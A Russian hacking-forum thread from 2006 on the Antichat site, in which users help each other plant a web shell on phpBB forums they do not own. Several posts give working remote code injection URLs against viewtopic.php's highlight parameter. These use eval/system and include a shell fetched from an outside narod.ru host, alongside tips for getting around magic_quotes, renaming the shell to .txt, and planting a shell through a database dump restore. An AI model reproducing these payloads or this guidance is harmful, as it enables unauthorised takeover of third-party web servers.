ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Проблемы с заливкой шелла на phpbb
  #1  
Старый 11.10.2006, 22:18
Аватар для AlexCRC
AlexCRC
Познающий
Регистрация: 11.10.2006
Сообщений: 35
Провел на форуме:
60100

Репутация: 9
По умолчанию Проблемы с заливкой шелла на phpbb

Приет.
У меня проблемы с заливкой шеллла на форум phpbb
Хотинг находится на hut.ru. Там вроде как помню запрещено ссылатся на удаленные файлы.
пишу в строку такой код "http://www.ля-ля-ля.ru/viewtopic.php?xxx=wget%20http://ля-ля-ля.narod.ru/remview.php &p=12&highlight=%2527.system($_GET[xxx]).include%2527"

Вылазеет ошибки как и надо:
Код:
Warning: Unknown()\b#i): failed to open stream: No such file or directory in /home/Z/ewfefe.ru/WWW/viewtopic.php(1104) : regexp code on line 1

Warning: (null)(): Failed opening ')\b#i' for inclusion (include_path='.:') in /home/z/ewfewfe.ru/WWW/viewtopic.php(1104) : regexp code on line 1

Warning: No ending delimiter '#' found in /home/z/ewfewfew.ru/WWW/viewtopic.php(1104) : regexp code on line 2
Но файл не заливается на сервак.
Что делать? можно ли через viewtopic получить хотябы хеш админа?
Заранее ОЧЕНЬ! благодарен.

Последний раз редактировалось AlexCRC; 11.10.2006 в 22:20..
 
Ответить с цитированием

  #2  
Старый 11.10.2006, 22:27
Аватар для ZikZak
ZikZak
Постоянный
Регистрация: 27.07.2006
Сообщений: 405
Провел на форуме:
1377321

Репутация: 268
По умолчанию

Цитата:
http://ля-ля-ля.narod.ru/remview.php
Народ не поддерживает php
 
Ответить с цитированием

  #3  
Старый 11.10.2006, 22:31
Аватар для AlexCRC
AlexCRC
Познающий
Регистрация: 11.10.2006
Сообщений: 35
Провел на форуме:
60100

Репутация: 9
По умолчанию

Цитата:
Народ не поддерживает php
Ну так из-за этого и выбрал народ. Если поставлю с поддержкой php - то он отдаст выполненый скрипт
 
Ответить с цитированием

  #4  
Старый 11.10.2006, 22:31
Аватар для Nova
Nova
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
Провел на форуме:
7670961

Репутация: 1034


Отправить сообщение для Nova с помощью ICQ
По умолчанию

Меняй разрешение на шеле не php а txt тоесть remview.txt
 
Ответить с цитированием

  #5  
Старый 11.10.2006, 22:32
Аватар для 1ten0.0net1
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925

Репутация: 1348


По умолчанию

Да, не поддерживает, само собой, кроме того увидел странную конструкцию -
highlight=%2527.system($_GET[xxx]).include%2527"

viewtopic.php?t=2206&highlight=%2527.eval($_GET[c1]).%2527&c1=include($_GET[c2])&c2=http://your.site.com/shell.php

Вот это верный вариант, на будущее, переменные с1 и с2 лучше кавычками не обрамлять, ибо на серевер может стоять опция magic_quotes=on, которая будет добавлять к каждой твоей кавчыка слеш, что портит код и препятствует его исполнению.

И как указано выше, пробуй, конечно, расширение шелла менять на txt - предварительно создав файл shell.txt
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
 
Ответить с цитированием

  #6  
Старый 11.10.2006, 22:34
Аватар для KPOT_f!nd
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

давай на jino-net.ru
 
Ответить с цитированием

  #7  
Старый 11.10.2006, 22:42
Аватар для AlexCRC
AlexCRC
Познающий
Регистрация: 11.10.2006
Сообщений: 35
Провел на форуме:
60100

Репутация: 9
По умолчанию

Непомогло
Ни переименование файла, ни изменение кода
Код:
Parse error: parse error, unexpected $ in /home/z/ыshthj.ru/WWW/viewtopic.php(1104) : regexp code(1) : eval()'d code on line 1
Ссылки все правильные

Последний раз редактировалось AlexCRC; 11.10.2006 в 22:45..
 
Ответить с цитированием

  #8  
Старый 11.10.2006, 23:30
Аватар для AlexCRC
AlexCRC
Познающий
Регистрация: 11.10.2006
Сообщений: 35
Провел на форуме:
60100

Репутация: 9
По умолчанию

Люди помогите а?
Вот мой шелл: http://scriptmyphp.narod.ru/remview.php и он же http://scriptmyphp.narod.ru/remview.txt

Запрос такой:
Код:
http://Name.ru/viewtopic.php?t=12&highlight=%2527.eval($_GET[c1]).%2527&c1=include($_GET[c2])&c2=http://scriptmyphp.narod.ru/remview.txt
Запрос правильный?
Выводится
Код:
Parse error: parse error, unexpected $ in /home/z/ыshthj.ru/WWW/viewtopic.php(1104) : regexp code(1) : eval()'d code on line 1
 
Ответить с цитированием

  #9  
Старый 21.10.2006, 17:37
Аватар для naqnaq
naqnaq
Познающий
Регистрация: 21.10.2006
Сообщений: 62
Провел на форуме:
346258

Репутация: 22
По умолчанию

Не стал создавать новую тему.
Вопрос все тот же - заливка шела через админ панель phpBB.
На форуме предлагается заливать посредством SQL =====> Дам базы формума - Внесение в дамп код шела - Рестор подправленной базы.

Послкольку сам я никогда с этим дела не имел, вопрос в следующем:
Необходимо ресторить дамп базы всего форума или же будет достаточно дапма содержащего толко sql запрос на запись шела?
Вопрос назрел потому, что дамп весит больше 100Мг в неупакованном виде (gzip запрещен). Не понятно каким образом происходит рестор - это полное стирание существующего с последующей добавлением, или же - добавление и перезапись уже существующего. Если первое, то после ресторе дампа содержащего лишь код шела будет пустой форум, что не хотелось бы. Вопрос скорее касается не phpBB, а SQL в целом.

Последний раз редактировалось naqnaq; 21.10.2006 в 17:59..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Вопрос по заливке шелла, используя уязвимость highlight в форуме phpBB 2.0.6 vega2k Форумы 12 11.01.2009 15:57
exploit phpBB 2.0.19 ( by SpiderZ ) liauliau Форумы 21 13.01.2007 23:01
Взлом. Способы заливки шелла в phpBB. MacTep Форумы 16 13.06.2006 21:03
Проблемы с Аничатовскими штучками. temon Болталка 4 27.09.2005 12:52
Вопрос про заливку шелла в Powered by phpBB 2.0.8 © 2001 phpBB Group onyx3 Форумы 38 15.02.2005 16:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ